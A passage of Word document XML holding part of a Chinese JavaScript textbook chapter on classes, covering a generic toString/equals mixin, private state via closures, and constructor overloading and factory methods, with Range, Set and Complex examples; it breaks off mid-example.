    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var generic={//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个字符串，这个字符串包含构造函数的名字（如果构造函数包含名字）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以及所有非继承来的、非函数属性的名字和值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s='[';//</w:t>
      </w:r>
      <w:r>
        <w:t>如果这个对象包含构造函数，且构造函数包含名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个名字会作为返回字符串的一部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>需要注意的是，函数的名字属性是非标准的，并不是在所有的环境中都可用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.constructor</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>this.constructor.name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s+=this.constructor.name+":"</w:t>
      </w:r>
      <w:r>
        <w:t>;//</w:t>
      </w:r>
      <w:r>
        <w:t>枚举所有的非继承的、非函数属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var name in this){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!this.hasOwnProperty(name))continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过继承来的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=this[name];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof value==="function")continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n++)s+=",";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s+=name+'='+value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return s+']';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},//</w:t>
      </w:r>
      <w:r>
        <w:t>通过比较</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t>的构造函数和实例属性来判断它们是否相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这种方法只适合于那些实例属性是原始值的情况，原始值可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>"==="</w:t>
      </w:r>
      <w:r>
        <w:t>来比较</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里还处理一种特殊情况，就是忽略由</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类添加的特殊属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>equals:function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(that==null)return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(this.constructor!==that.constructor)return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var name in this){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(name==="|**objectid**|")continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过特殊属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!this.hasO</w:t>
      </w:r>
      <w:r>
        <w:t>wnProperty(name))continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过继承来的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this[name]!==that[name])return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>比较是否相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return true;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果所有属性都匹配，两个对象相等</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41" w:name="9_6_6_Si_You_Zhuang_Tai_"/>
      <w:r>
        <w:t>9.6.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　私有状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在经典的面向对象编程中，经常需要将对象的某个状态封装或隐藏在对象内，只有通过对象的方法才能访问这些状态，对外只暴露一些重要的状态变量可以直接读写。为了实现这个目的，类似</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的编程语言允许声明类的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>私有</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>实例字段，这些私有实例字段只能被类</w:t>
      </w:r>
      <w:r>
        <w:t>的实例方法访问，且在类的外部是不可见的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们可以通过将变量（或参数）闭包在一个构造函数内来模拟实现私有实例字段，调用构造函数会创建一个实例。为了做到这一点，需要在构造函数内部定义一个函数（因此这个函数可以访问构造函数内部的参数和变量），并将这个函数赋值给新创建对象的属性。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-10</w:t>
      </w:r>
      <w:r>
        <w:t>展示了对</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类的另一种封装，新版的类的实例包含</w:t>
      </w:r>
      <w:r>
        <w:t>from()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>to()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用以返回范围的端点，而不是用</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>属性来获取端点。这里的</w:t>
      </w:r>
      <w:r>
        <w:t>from()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>t o()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是定义在每个</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>而不是从原型中继承来的。其</w:t>
      </w:r>
      <w:r>
        <w:t>他的</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>方法还是和之前一样定义在原型中，但获取端点的方式从之前直接从属性读取变成了通过</w:t>
      </w:r>
      <w:r>
        <w:t>from()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>to()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来读取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-10</w:t>
      </w:r>
      <w:r>
        <w:t>：对</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类的读取端点方法的简单封装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Range(from,to){//</w:t>
      </w:r>
      <w:r>
        <w:t>不要将端点保存为对象的属性，相反</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义存取器函数来返回端点的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这些值都保存在闭包中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.from=function(){return from;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.to=function(){return to;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>原型上的方法无法直接操作端点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它们必须调用存取器方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>constructor:Range,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>includes:function(x){return this.from()</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to();},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var x=Math.ceil(this.from()),max=this.to();x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=max;x++)f(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){return"("+this.from()+"..."+this.to()</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这个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类定义了用以读取范围端点的方法，但没有定义设置端点的方法或属性。这让类的实例看起来是不可修改的，如果使用正确的话，一旦创建</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象，端点数据就不可修改了。除非使用</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>（参照</w:t>
      </w:r>
      <w:r>
        <w:t>9.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）中的某些特性，但</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>属性依然是可写的，并且</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象实际上并不是真正不可修改的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var r=new Range(1,5);//</w:t>
      </w:r>
      <w:r>
        <w:t>一个不可修改的范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>r.from=function(){return 0;};//</w:t>
      </w:r>
      <w:r>
        <w:t>通过方法替换来修改它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但需要注意的是</w:t>
      </w:r>
      <w:r>
        <w:t>，这种封装技术造成了更多系统开销。使用闭包来封装类的状态的类一定会比不使用封装的状态变量的等价类运行速度更慢，并占用更多内存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="242" w:name="9_6_7_Gou_Zao_Han_Shu_De_Zhong_Zai_He_Go"/>
      <w:r>
        <w:t>9.6.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　构造函数的重载和工厂方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有时候，我们希望对象的初始化有多种方式。比如，我们想通过半径和角度（极坐标）来初始化一个</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而不是通过实部和虚部来初始化，或者通过元素组成的数组来初始化一个</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而不是通过传入构造函数的参数来初始化它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有一个方法可以实现，通过重载（</w:t>
      </w:r>
      <w:r>
        <w:t>overload</w:t>
      </w:r>
      <w:r>
        <w:t>）这个构造函数让它根据传入参数的不同来执行不同的初始化方法。下面这段代码就</w:t>
      </w:r>
      <w:r>
        <w:t>是重载</w:t>
      </w:r>
      <w:r>
        <w:t>Set()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Set(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.values={};//</w:t>
      </w:r>
      <w:r>
        <w:t>用这个对象的属性来保存这个集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.n=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>集合中值的个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果传入一个类数组的对象，将这个元素添加至集合中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，将所有的参数都添加至集合中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments.length==1</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>isArrayLike(arguments[0]))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.add.apply(this,arguments[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>else if(arguments.length</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.add.apply(this,arguments);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这段代码所定义的</w:t>
      </w:r>
      <w:r>
        <w:t>Set()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数可以显式将一组元素作为参数列表传入，也可以传入元素组成的数组。但是这个构造函数有多义性，如果集合的某个成员是一个数组就无法通过这个构造函数来创建这个集合了（为了做到这一点，需要首先创建一个空集合，然后显式调用</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在使用极坐标来初始化复数的例子中，实际上并没有看到有函数重载。代表复数两个维度的数字都是浮点数，除非给构造函数传入第三个参数，否则构造函数无法识别到底传入的是极坐标参数还是直角坐标</w:t>
      </w:r>
      <w:r>
        <w:t>参数。相反，可以写一个工厂方法</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>一个类的方法用以返回类的一个实例。下面的例子即是使用工厂方法来返回一个使用极坐标初始化的</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.polar=function(r,theta){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new Complex(r*Math.cos(theta),r*Math.sin(theta));</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下面这个工厂方法用来通过数组初始化</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Set.fromArray=function(a){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s=new Set();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个空集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.add.apply(s,a</w:t>
      </w:r>
      <w:r>
        <w:t>);//</w:t>
      </w:r>
      <w:r>
        <w:t>将数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的成员作为参数传入</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return s;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回这个新集合</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可以给工厂方法定义任意的名字，不同名字的工厂方法用以执行不同的初始化。但由于构造函数是类的公有标识，因此每个类只能有一个构造函数。但这并不是一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>必须遵守</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的规则。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是可以定义多个构造函数继承自一个原型对象的，如果这样做的话，由这些构造函数的任意一个所创建的对象都属于同一类型。并不推荐这种技术，但下面的示例代码使用这种技术定义了该类型的一个辅助构造函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Set</w:t>
      </w:r>
      <w:r>
        <w:t>类的一个辅助构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>unction SetFromArray(a){//</w:t>
      </w:r>
      <w:r>
        <w:t>通过以函数的形式调用</w:t>
      </w:r>
      <w:r>
        <w:t>Set()</w:t>
      </w:r>
      <w:r>
        <w:t>来初始化这个新对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的元素作为参数传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="2Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.apply(this,a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
